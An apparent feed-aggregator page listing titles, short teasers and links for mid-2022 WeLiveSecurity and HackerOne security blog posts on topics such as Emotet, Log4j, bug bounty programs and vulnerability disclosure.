https://www.welivesecurity.com/2022/06/29/do-back-offices-mean-backdoors/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

5 ways cybercriminals steal credit card details
Here are some of the most common ways hackers can get hold of other people's credit card data – and how you can keep yours safe The post 5 ways cybercriminals steal credit card details appeared first on WeLiveSecurity
https://www.welivesecurity.com/2022/06/27/5-ways-cybercriminals-steal-credit-card-details/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Instagram's new age verification tool – Week in security with Tony Anscombe
As Instagram tests a new age verification tool, what are some of the concerns when it comes to confirming someone's age on the internet? The post Instagram's new age verification tool – Week in security with Tony Anscombe appeared first on WeLiveSecurity
https://www.welivesecurity.com/videos/instagrams-new-age-verification-tool-week-security-tony-anscombe/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Virtual private networks: 5 common questions about VPNs answered
(Almost) everything you always wanted to know about virtual private networks, but were afraid to ask The post Virtual private networks: 5 common questions about VPNs answered appeared first on WeLiveSecurity
https://www.welivesecurity.com/2022/06/23/virtual-private-networks-5-common-questions-vpns-answered/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Phishing awareness training: Help your employees avoid the hook
Educating employees about how to spot phishing attacks can strike a much-needed blow for network defenders The post Phishing awareness training: Help your employees avoid the hook appeared first on WeLiveSecurity
https://www.welivesecurity.com/2022/06/21/phishing-awareness-training-help-employees-avoid-hook/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Crypto mixers: What are they and how are they used?
How crypto mixers, also known as crypto tumblers, are used to obscure the trail of digital money The post Crypto mixers: What are they and how are they used? appeared first on WeLiveSecurity
https://www.welivesecurity.com/2022/06/20/crypto-mixers-what-are-they-how-are-they-used/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

How to spot malicious spam – Week in security with Tony Anscombe
As the risk of receiving a malware-laden email increases, take a moment to consider how to spot attacks involving malicious spam The post How to spot malicious spam – Week in security with Tony Anscombe appeared first on WeLiveSecurity
https://www.welivesecurity.com/videos/how-spot-malicious-spam-week-security-tony-anscombe/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

How Emotet is changing tactics in response to Microsoft's tightening of Office macro security
Emotet malware is back with ferocious vigor, according to ESET telemetry in the first four months of 2022. Will it survive the ever-tightening controls on macro-enabled documents? The post How Emotet is changing tactics in response to Microsoft's tightening of Office macro security appeared first on WeLiveSecurity
https://www.welivesecurity.com/2022/06/16/how-emotet-is-changing-tactics-microsoft-tightening-office-macro-security/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Industroyer: A cyber‑weapon that brought down a power grid
Five years ago, ESET researchers released their analysis of the first ever malware that was designed specifically to attack power grids The post Industroyer: A cyber‑weapon that brought down a power grid appeared first on WeLiveSecurity
https://www.welivesecurity.com/2022/06/13/industroyer-cyber-weapon-brought-down-power-grid/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

3 takeaways from RSA Conference 2022 – Week in security with Tony Anscombe
Here are three themes that stood out at the world's largest gathering of cybersecurity professionals The post 3 takeaways from RSA Conference 2022 – Week in security with Tony Anscombe appeared first on WeLiveSecurity
https://www.welivesecurity.com/videos/takeaways-rsa-conference-2022-week-in-security-with-tony-anscombe/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

RSA – APIs, your organization's dedicated backdoors
API-based data transfer is so rapid, there's but little time to stop very bad things happening quickly The post RSA – APIs, your organization's dedicated backdoors appeared first on WeLiveSecurity
https://www.welivesecurity.com/2022/06/10/rsa-apis-your-organizations-dedicated-backdoors/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

RSA – Creepy real‑world edition
Digital fiddling somehow got mixed up in a real war The post RSA – Creepy real‑world edition appeared first on WeLiveSecurity
https://www.welivesecurity.com/2022/06/09/rsa-creepy-real-world-edition/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

RSA – Digital healthcare meets security, but does it really want to?
Technology is understandably viewed as a nuisance to be managed in pursuit of the health organizations' primary mission The post RSA – Digital healthcare meets security, but does it really want to? appeared first on WeLiveSecurity
https://www.welivesecurity.com/2022/06/08/rsa-digital-healthcare-meets-security-does-really-want/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

RSA – Spot the real fake
How erring on the side of privacy might ultimately save you from chasing down a virtual rendition of you doing the bidding of a scammer The post RSA – Spot the real fake appeared first on WeLiveSecurity
https://www.welivesecurity.com/2022/06/07/rsa-spot-the-real-fake/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Cybersecurity awareness training: What is it and what works best?
Give employees the knowledge needed to spot the warning signs of a cyberattack and to understand when they may be putting sensitive data at risk The post Cybersecurity awareness training: What is it and what works best? appeared first on WeLiveSecurity
https://www.welivesecurity.com/2022/06/07/cybersecurity-awareness-training-what-is-it-what-works-best/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Key insights from ESET's latest Threat Report – Week in security with Tony Anscombe
A review of the key trends that defined the threatscape in the first four months of 2022 and what these developments mean for your cyber-defenses The post Key insights from ESET’s latest Threat Report – Week in security with Tony Anscombe appeared first on WeLiveSecurity
https://www.welivesecurity.com/videos/key-stats-eset-threat-report-t%e2%80%8a12022/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

100 days of war in Ukraine: How the conflict is playing out in cyberspace
It's been 100 days since Russia invaded Ukraine, and we look back at various cyberattacks connected to the conflict The post 100 days of war in Ukraine: How the conflict is playing out in cyberspace appeared first on WeLiveSecurity
https://www.welivesecurity.com/2022/06/03/100-days-war-ukraine-conflict-cyberspace/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

ESET Threat Report T 1 2022
A view of the T 1 2022 threat landscape as seen by ESET telemetry and from the perspective of ESET threat detection and research experts The post ESET Threat Report T 1 2022 appeared first on WeLiveSecurity
https://www.welivesecurity.com/2022/06/02/eset-threat-report-t12022/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Talking to children about the internet: A kid's perspective
A 14-year-old shares his thoughts about technology and the potential privacy and security implications of the internet The post Talking to children about the internet: A kid's perspective appeared first on WeLiveSecurity
https://www.welivesecurity.com/2022/06/01/talking-children-internet-kids-perspective/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Keeping it real: Don't fall for lies about the war
Falsehoods about the war in Ukraine come in all shapes and sizes – here are a few examples of what's in the fake news The post Keeping it real: Don't fall for lies about the war appeared first on WeLiveSecurity
https://www.welivesecurity.com/2022/05/30/keeping-it-real-dont-fall-lies-war/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

H1-702 Las Vegas Day 3: Switching Up Scopes

https://www.hackerone.com/community-blog/h1-702-las-vegas-day-3-switching-scopes
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

H1-702 Las Vegas Day 2: Hacking with Zoom

https://www.hackerone.com/community-blog/h1-702-las-vegas-day-2-hacking-zoom
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

H1-702 Las Vegas Day 1: H@cktivitycon

https://www.hackerone.com/community-blog/h1-702-las-vegas-day-1-hcktivitycon
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

H1-702 Las Vegas Day 0: Setup

https://www.hackerone.com/community-blog/h1-702-las-vegas-day-0-setup
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

PayPal's Third LHE Brings Top Global Hackers to the Virtual Stage
After ten years of partnering with hackers, PayPal is a leader in cybersecurity and hacker relationship building. We were thrilled to work with PayPal once again to uncover new ways to reduce their risk and build proactive security practices.
https://www.hackerone.com/community-blog/paypals-third-lhe-brings-top-global-hackers-virtual-stage
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Benchmark Analysis: Annual Pentest and Code Review Coverage

https://www.hackerone.com/penetration-testing/benchmark-analysis-annual-pentest-and-code-review-coverage
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

5 Articles to Get You Up-to-Speed on Bug Bounty Programs
Many organizations use bug bounty programs to help them protect their ever-expanding attack surface and achieve attack resistance. Bug bounties, with ethical hackers at the helm, uncover critical and severe vulnerabilities before bad actors and deliver better protection against cyberattacks. But what is a bug bounty, and should your organization have one?
https://www.hackerone.com/vulnerability-management/5-articles-get-you-speed-bug-bounty-programs
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Ten Rules to be Successful in Your Bug Bounty Career

https://www.hackerone.com/hackerone-community-blog/ten-rules-be-successful-your-bug-bounty-career
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Security Highlights: New CWE Rankings, Software Supply Chains, and Side-Channel Attacks

https://www.hackerone.com/application-security/security-highlights-new-cwe-rankings-software-supply-chains-and-side-channel
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

5 Security Stages of the DevSecOps Pipeline
DevSecOps builds on modern DevOps practices by incorporating security processes and automation into the development pipeline. This enables development teams to continue the rapid and continuous delivery trend while improving software assets' security. The DevSecOps pipeline follows the familiar DevOps “infinity loop” structure while incorporating some extra steps to ensure code security before, during, and after it's pushed to production.
https://www.hackerone.com/application-security/5-security-stages-devsecops-pipeline
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Hacker's Health: Adverse Effects of Doomscrolling

https://www.hackerone.com/community-blog/hackers-health-adverse-effects-doomscrolling
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

The Most Overlooked Server Permission Checks

https://www.hackerone.com/application-security/most-overlooked-server-permission-checks
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

DevSecOps vs DevOps: What is the Difference?
DevSecOps can dramatically reduce cyber risk for organizations—particularly those that rely on internal development for a competitive advantage.
https://www.hackerone.com/application-security/devsecops-vs-devops-what-difference
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

HackerOne's In-Depth Approach to Vulnerability Triage and Validation

https://www.hackerone.com/hackerones-depth-approach-vulnerability-triage-and-validation
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

How Bug Bounty Uncovered A 5-Year-Old Vulnerability In Hours

https://www.hackerone.com/ethical-hacker/how-bug-bounty-uncovered-5-year-old-vulnerability-hours
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Live Hacking Event Invitations - 2022 Guide

https://www.hackerone.com/community-blog/live-hacking-event-invitations-2022-guide
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

CISOs: Do You Know the Security Risks of Your Organization's Next M&A?
An ever-expanding attack surface is a global concern for most organizations and complicates an M&A, especially for CISOs. The M&A prospect may have a partially unprotected attack surface, thus increasing security risk coming in the form of a gap between the attack surface they can and do protect and the attack surface (and accompanying assets) they need to defend. This gap is what many M&A prospects bring to the table. And while an M&A may have undisputed business and strategic value, CISOs must still address the security risks involved in acquiring another organization's assets and its current attack surface, fully protected or not.
https://www.hackerone.com/vulnerability-management/cisos-do-you-know-security-risks-your-organizations-next-ma
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

H1 Community Team: Your Hacker Allies

https://www.hackerone.com/hackerone-community-blog/h1-community-team-your-hacker-allies
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Community at HackerOne: What's to Come

https://www.hackerone.com/community-blog/community-hackerone-whats-come
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

The Top 5 Most Common Security Issues I Discover When Reviewing Code

https://www.hackerone.com/top-5-most-common-security-issues-i-discover-when-reviewing-code
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

How to Catch Injection Security Vulnerabilities in Code Review
Injection vulnerabilities result from insecure handling of user inputs. They are relatively simple to fix once the underlying issues that cause them are understood, and are frequently found by experienced reviewers who know what to look for. The prevalence of injection vulnerabilities today is one of the best arguments for continuing to perform code review in many organizations—this type of vulnerability is most frequently caught through human inspection of the offending code.
https://www.hackerone.com/vulnerability-management/how-catch-injection-security-vulnerabilities-code-review
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Severe Confluence Vulnerability is an Active Threat (CVE-2022-26134)

https://www.hackerone.com/application-security/severe-confluence-vulnerability-active-threat-cve-2022-26134
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

How Critical Infrastructure Can be Protected from Threats
Accessing a major critical infrastructure network is very appealing to cybercriminals, as they can maximize societal impact and demand large ransom sums to fix tampered systems. With recent high-profile attacks, including that against the Colonial Pipeline in March 2021, it has become clear that the organizations handling critical infrastructure networks are now in the firing line. Critical infrastructure is vulnerable to both threat groups that are evolving their tactics and public scrutiny if they do not remain transparent when an attack occurs.
https://www.hackerone.com/vulnerability-management/how-critical-infrastructure-can-be-protected-threats
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Ethical Hackers Help Beiersdorf Minimize Risk and Protect Their Attack Surface
After a year of running a private Vulnerability Disclosure Program (VDP), Beiersdorf is announcing the launch of its public VDP. HackerOne met with Kai Widua, Chief Information Security Officer (CISO) at Beiersdorf, to learn about the challenges they face in retail security.
https://www.hackerone.com/customer-stories/ethical-hackers-help-beiersdorf-minimize-risk-and-protect-their-attack-surface
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

What Is a Security.txt File and How Can It Help Your Program?

https://www.hackerone.com/security-compliance/what-securitytxt-file-and-how-can-it-help-your-program
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

5 Ways I Provide Value as a PullRequest Reviewer When I Start Reviewing a New Project
Important reviewer traits for providing a great code review include prior knowledge and experience, expertise, background context, attention to detail, and written communication skills. As a reviewer on PullRequest, I need to quickly gain context when I'm reviewing a project for the first time. But as is the case for any engineer new to a team, some context is gained over time.
https://www.hackerone.com/application-security/5-ways-i-provide-value-pullrequest-reviewer-when-i-start-reviewing-new-project
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

HackerOne Announces a New Customer Pentest Setup that's More Efficient and Speeds Time to Launch

https://www.hackerone.com/assessments/hackerone-announces-new-customer-pentest-setup-thats-more-efficient-and-speeds-time
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Understanding Public and Private Bug Bounties and Vulnerability Disclosure Programs

https://www.hackerone.com/vulnerability-management/understanding-public-and-private-bug-bounties-and-vulnerability-disclosure
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

What is Attack Resistance Management?
A Security Survey on How to Close Your Organization's Attack Resistance Gap
https://www.hackerone.com/company-news/what-attack-resistance-management
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Why HackerOne Acquired Pull Request and What It Means to Our Customers

https://www.hackerone.com/company-news/why-hackerone-acquired-pull-request-and-what-it-means-our-customers
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Announcing the Results of the 12-month DIB-VDP Pilot

https://www.hackerone.com/vulnerability-disclosure/announcing-results-12-month-dib-vdp-pilot
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

How Wix Improves Their Security Posture with Ethical Hackers
Reducing risk is fundamental to Wix's approach to cybersecurity, and as the threat landscape evolves, they turn to HackerOne Bounty to protect their security posture. Since 2018, Wix has invited tens of thousands of ethical hackers worldwide to ensure new and existing features are secure. We recently met with two Wix security team members to learn how they leverage ethical hackers to detect risks before they become threats and how vulnerability insights help strengthen their security posture.
https://www.hackerone.com/customer-stories/how-wix-improves-their-security-posture-ethical-hackers
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Announcing the HackerOne 2022 Attack Resistance Report: A Security Survey—How to Close Your Organization's Attack Resistance Gap
Today, HackerOne published The 2022 Attack Resistance Report: A HackerOne Security Survey. Our research revealed an increasing gap—the attack resistance gap—between what organizations can defend and what they need to defend. The gap is the result of four components prevalent across organizations.
https://www.hackerone.com/company-news/announcing-hackerone-2022-attack-resistance-report-security-survey-how-close-your
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

How Ethical Hackers Help A.S. Watson Address Digital Risk
We recently met with A.S. Watson's Chief Information Security Officer (CISO), Feliks Voskoboynik, to learn how ethical hackers have helped with digital transformation and enabled his team to harden their attack surface. Read on to learn Feliks' advice on including a bug bounty program as part of a security strategy, the lessons ethical hackers have provided, and what best practices he can share with other CISOs.
https://www.hackerone.com/customer-stories/how-ethical-hackers-help-watson-address-digital-risk
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Preventing Compromised Password Reuse on HackerOne.com

https://www.hackerone.com/best-practices/preventing-compromised-password-reuse-hackeronecom
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Shifting Left with Ethical Hackers: A Q&A with GitLab
Secure applications start with secure code. As organizations deploy code faster than ever, implementing continuous security across the software development lifecycle (SDLC) is critical to building secure products. As a long-time HackerOne Bounty customer, GitLab knows the importance of identifying and addressing bugs as early as possible in the SDLC. We wanted to hear what they had to say about leveraging the human intelligence of ethical hackers to broadly test their attack surface and increase their ability to resist potential threats.
https://www.hackerone.com/bounty/shifting-left-ethical-hackers-qa-gitlab
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Donating Bounties to Humanitarian Efforts in Ukraine

https://www.hackerone.com/donating-bounties-humanitarian-efforts-ukraine
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Securing Digital Transformation with Vulnerability Disclosure: A Q&A with John Deere CISO, James Johnson
To help fortify security defenses for their customers, dealers, suppliers, and employees, John Deere recently launched a public Vulnerability Disclosure Program (VDP) with HackerOne. HackerOne recently met with James Johnson, CISO at John Deere, to learn why his security team works with ethical hackers to help identify security gaps and increase their product and data security.
https://www.hackerone.com/vulnerability-disclosure/securing-digital-transformation-vulnerability-disclosure-qa-john-deere
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

The Only Solution That Scales With the Cybersecurity Challenge

https://www.hackerone.com/ceo/only-solution-scales-cybersecurity-challenge
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Nine Months into the DIB-VDP Pilot, Nearly 1,000 Valid Vulnerabilities Have Been Identified
With three months left in the 12-month pilot with the Department of Defense's Defense Industrial Base Vulnerability Disclosure Pilot (DOD DIB-VDP Pilot), HackerOne sat down with DC3 to discuss why new DIB companies are joining the pilot and hear why hackers are a critical partner for the DOD.
https://www.hackerone.com/customer-stories/nine-months-dib-vdp-pilot-nearly-1000-valid-vulnerabilities-have-been-identified
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

The HackerOne Global Top 10—Hacker Expertise, Industry Data, and Up-to-Date Vulnerabilities

https://www.hackerone.com/vulnerability-management/hackerone-global-top-10-hacker-expertise-industry-data-and-date
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Log4Shell: Attack Evolution
HackerOne has unique visibility into the global response to Log4Shell, seeing in real time how organizations responded and remediated. Last week HackerOne's CISO Chris Evans and Co-founder Jobert Abma shared findings from our platform.
https://www.hackerone.com/vulnerability-management/log4shell-attack-evolution
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Top 5 Takeaways from the 2021 Hacker-Powered Security Report: Industry Insights

https://www.hackerone.com/hacker-powered-security-report/top-5-takeaways-2021-hacker-powered-security-report-industry
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

CWE [Common Weakness Enumeration] | Why It Is Important
Are you wondering about CWE? We explain CWE (Common Weakness Enumeration) and why this community-based initiative is essential in cybersecurity
https://www.hackerone.com/vulnerability-management/cwe-common-weakness-enumeration-why-it-important
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Log4j Vulnerability Activity on the HackerOne Platform
This post is about the severe and widespread Log4j vulnerability. It gives a technical overview of the vulnerability, mitigations HackerOne has put in place to protect our platform and customers, and the related vulnerability submission activity HackerOne is seeing on its platform.
https://www.hackerone.com/vulnerability-management/log4j-vulnerability-activity-hackerone-platform
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Common Vulnerability Scoring System [CVSS] | A Complete Explanation
Were you wondering about the Common Vulnerability Scoring System (CVSS)? We explain what CVSS is, why it is important, and show how to prioritize vulnerabilities based on their score.
https://www.hackerone.com/vulnerability-management/common-vulnerability-scoring-system-cvss-complete-explanation
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

How Hackers Help Organizations Face New Attack Vectors and Build Stronger Security Programs
The risk of cyberattacks grows every day. But there is an essential defensive step that organizations can take: hacker-powered security programs.
https://www.hackerone.com/security-event/how-hackers-help-organizations-face-new-attack-vectors-and-build-stronger-security
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Vulnerability Management | A Complete Guide and Best Practices
We explain what vulnerability management is and why it matters, and we give a step-by-step guide to implementing a vulnerability management process.
https://www.hackerone.com/vulnerability-management/vulnerability-management-complete-guide-and-best-practices
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Securing the Supply Chain by Working With Ethical Hackers
Software supply chain attacks increasingly create concern among cybersecurity experts as these exploits are becoming more common. But solving the problem has left organizations scrambling for an answer because supply-chain security management is inherently complex.
https://www.hackerone.com/vulnerability-management/securing-supply-chain-working-ethical-hackers
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

TikTok Celebrates One Year of Bug Bounty
As part of an ongoing commitment to proactive cybersecurity, TikTok celebrated its one-year anniversary of HackerOne bug bounty by thanking (via video, of course!) 150+ hackers from around the globe who have helped them identify and resolve more than 225 vulnerabilities. They also share insights into assets in scope, their commitment to transparency, and their best-in-class payout and response time metrics.
https://www.hackerone.com/customer-stories/tiktok-celebrates-one-year-bug-bounty
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Bug Bounty Platforms [Best Choices For a Bug Bounty Program]
Are you wondering about bug bounty platforms? We explain what a bug bounty platform is and how it can help you run a successful bug bounty program.
https://www.hackerone.com/vulnerability-management/bug-bounty-platforms-best-choices-bug-bounty-program
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

How Elastic Attracts and Retains Top Hackers Without Offering the Highest Bounties
Skilled hackers are the foundation of an effective bug bounty program. But how can you ensure your program attracts top hackers and keeps them engaged?
https://www.hackerone.com/how-elastic-attracts-and-retains-top-hackers-without-offering-highest-bounties
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

How Hackers Can Strengthen Cloud Security for Applications
In this session at our 5th annual global cybersecurity conference, HackerOne's Tim Matthews sat down with Josh Bressers, Tech Lead of Product Security at Elastic, to discuss cloud security for applications. They focused on the challenges around cloud security and the role of hacker-powered defensive efforts. Josh's organization, Elastic, is the leading enterprise search company with expertise in building self-managed services for search, logging, security, and analytics use cases.
https://www.hackerone.com/ethical-hacker/how-hackers-can-strengthen-cloud-security-applications
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

What Is a Bug Bounty? Should You Offer One? And How To Do It

https://www.hackerone.com/vulnerability-management/what-bug-bounty-should-you-offer-one-and-how-do-it
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Bug Bounty vs. VDP | Which Program Is Right for You?
We explain bug bounty programs and Vulnerability Disclosure Programs (VDPs), their pros and cons, and how each can help your organization.
https://www.hackerone.com/vulnerability-management/bug-bounty-vs-vdp-which-program-right-you
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

How to Use Bug Bounty Program Data to Improve Security and Development
Bug bounty program data tells a story—but which story? Tracking program metrics can help organizations identify issues, spot opportunities, and take corrective actions. To do this, stakeholders must know which metrics to track and how to interpret the results.
https://www.hackerone.com/vulnerability-management/how-use-bug-bounty-program-data-improve-security-and-development
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

DOD's DIB-VDP Pilot Hits Six Month Milestone
Six months into the 12-month pilot with the Department of Defense's Defense Industrial Base Vulnerability Disclosure Pilot (DOD DIB-VDP Pilot), HackerOne sat down with key stakeholders from the DIB-VDP Pilot to discuss the program's success to date, the Federal Government's strategy for working with hackers, and to hear about some of the most impactful vulnerabilities discovered to date.
https://www.hackerone.com/customer-stories/dods-dib-vdp-pilot-hits-six-month-milestone
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Vulnerability Disclosure | What's the Responsible Solution?
Curious about vulnerability disclosure? We explain what it is, why there may be friction between the researcher and the organization, and possible solutions.
https://www.hackerone.com/vulnerability-disclosure/vulnerability-disclosure-whats-responsible-solution
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Jedox's Journey with HackerOne: A Q&A with CTO, Vladislav Maličević
Jedox secures their cloud - and their customers - with HackerOne Assessments and HackerOne Bounty. Read this blog to learn how they're creating a best-in-class cybersecurity program thanks to ethical hackers.
https://www.hackerone.com/best-practices/jedoxs-journey-hackerone-qa-cto-vladislav-malicevic
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

DevSecOps: Bridging the Gap Between Security and Development
Organizations that rely on developing secure, functional products understand the value of increased collaboration between security and development teams. Tighter partnerships between the two teams can allow organizations to deliver better, safer products faster, but how can this work in the real world?
https://www.hackerone.com/security-event/devsecops-bridging-gap-between-security-and-development
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

How Trustpilot Manages Risk by Working with Ethical Hackers
At our 2021 Security@ conference, we spoke with Stu Hirst, CISO at consumer review site Trustpilot. Trustpilot's mission is to create an independent currency of trust between consumers and businesses, and cybersecurity plays a central role.
https://www.hackerone.com/bounty/how-trustpilot-manages-risk-working-ethical-hackers
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

What's a Vulnerability Disclosure Program & Do You Need One?
Are you wondering about Vulnerability Disclosure Programs (VDPs)? Here's why you need one, and instructions on starting one or improving your current process.
https://www.hackerone.com/vulnerability-disclosure/whats-vulnerability-disclosure-program-do-you-need-one
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Bug Bounty Benefits | Why You Need a Bug Bounty Program
​​​​​​​We explain how a bug bounty program identifies vulnerabilities, discuss the program's benefits, and detail its challenges.
https://www.hackerone.com/bounty/bug-bounty-benefits-why-you-need-bug-bounty-program
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Navigating a Safe, Successful Return to Office: 5 Tips for Security Leaders
Security leaders have a lot on their plates in these later stages of the continuing COVID-19 pandemic. In a 2021 survey by Gartner, over three-quarters (76%) of respondents reported increased demand for new digital products or services during the pandemic — and 83% expected this demand to continue to increase. This imperative for transformation has been coming straight from the top: 69% of boards report accelerating digital business initiatives in response to COVID-19.
https://www.hackerone.com/company-news/navigating-safe-successful-return-office-5-tips-security-leaders
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Vulnerability Remediation | A Step-by-Step Guide
Are you wondering about vulnerability remediation? We give you a step-by-step guide to addressing vulnerabilities in your system.
https://www.hackerone.com/vulnerability-remediation-step-step-guide
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

How Hackers—the Best Kept Secret in Cybersecurity—Can Help Your Organization Protect its Assets and Improve Security
Last week, HackerOne held its fifth annual one-of-a-kind global Security@ conference featuring the best-kept secret in cybersecurity—hackers.
https://www.hackerone.com/ethical-hacker/how-hackers-best-kept-secret-cybersecurity-can-help-your-organization-protect-its
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

The Top 5 Cloud Security Risks: How Hacker-Powered Security Can Help
Widespread digital transformation means increased cloud security risk. Learn how human intelligence—hacker-powered security—can help your organization defend against new attack vectors, mitigate risk, and improve cloud security.
https://www.hackerone.com/application-security/top-5-cloud-security-risks-how-hacker-powered-security-can-help
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Time to Issue Your Own Cyber Executive Order

https://www.hackerone.com/from-the-ceo/time-issue-your-own-cyber-executive-order
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Vulnerability Testing | Best Techniques for Assessing Risks
Curious about vulnerability testing techniques? We explain processes such as vulnerability assessments, vulnerability scanning, and penetration testing.
https://www.hackerone.com/vulnerability-management/vulnerability-testing-best-techniques-assessing-risks
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

How Hacker-Powered Security Can Help Security Teams Become More Data-Driven

https://www.hackerone.com/vulnerability-management/how-hacker-powered-security-can-help-security-teams-become-more-data
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Vulnerability Assessment Tools [Top Tools & What They Do]
Are you curious about the best vulnerability assessment tools? We detail some of the popular tools, what they do, and their pros and cons.
https://www.hackerone.com/vulnerability-management/vulnerability-assessment-tools-top-tools-what-they-do
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Hacker-Powered Security and DeFi: How Human Intelligence Improves Cryptocurrency Security
Over the last year, DeFi has grown significantly with billions of dollars of cryptocurrency locked into blockchain contracts. With this growth comes increased risk and DeFi funds are lucrative targets for malicious actors. Learn how a HackerOne hacker helps protect DeFi funds and mitigate this risk.
https://www.hackerone.com/ethical-hacker/hacker-powered-security-and-defi-how-human-intelligence-improves-cryptocurrency
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

HackerOne Announces Hacker-Powered Cloud Security Capabilities for AWS Customers
HackerOne announces new capabilities for AWS customers looking to improve security in their cloud applications. These include vulnerability pentests specific to AWS environments, an AWS Security Hub integration for fast, effective security actions, and AWS Certified hackers. AWS customers can now identify and fix vulnerabilities quickly and develop a better understanding of their cloud application security profile.
https://www.hackerone.com/penetration-testing/hackerone-announces-hacker-powered-cloud-security-capabilities-aws-customers
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

How a New HackerOne Integration with AWS Security Hub Accelerates Vulnerability Remediation Time
HackerOne announced an integration with AWS Security Hub that exchanges vulnerability findings and streamlines workflows to accelerate security actions. The integration consolidates and routes vulnerability intelligence from HackerOne to AWS Security Hub, delivering greater visibility into crucial gaps that could lead to a cyberattack.
https://www.hackerone.com/company-news/how-new-hackerone-integration-aws-security-hub-accelerates-vulnerability-remediation
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

The DOD Improves Their Security Posture Through the DIB-VDP
One of the primary missions of the Defense Counterintelligence and Security Agency (DCSA) is to provide critical technology protection to the Defense Industrial Base (DIB). Given the recent increase in cyber incidents affecting the DIB, DCSA views the DIB-VDP Pilot as a promising way to identify and stop attempts at stealing our Nation's secrets.
https://www.hackerone.com/vulnerability-disclosure/dod-improves-their-security-posture-through-dib-vdp
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Hyatt's Bug Bounty Program Update: Q&A with Senior Analyst Robert Lowery
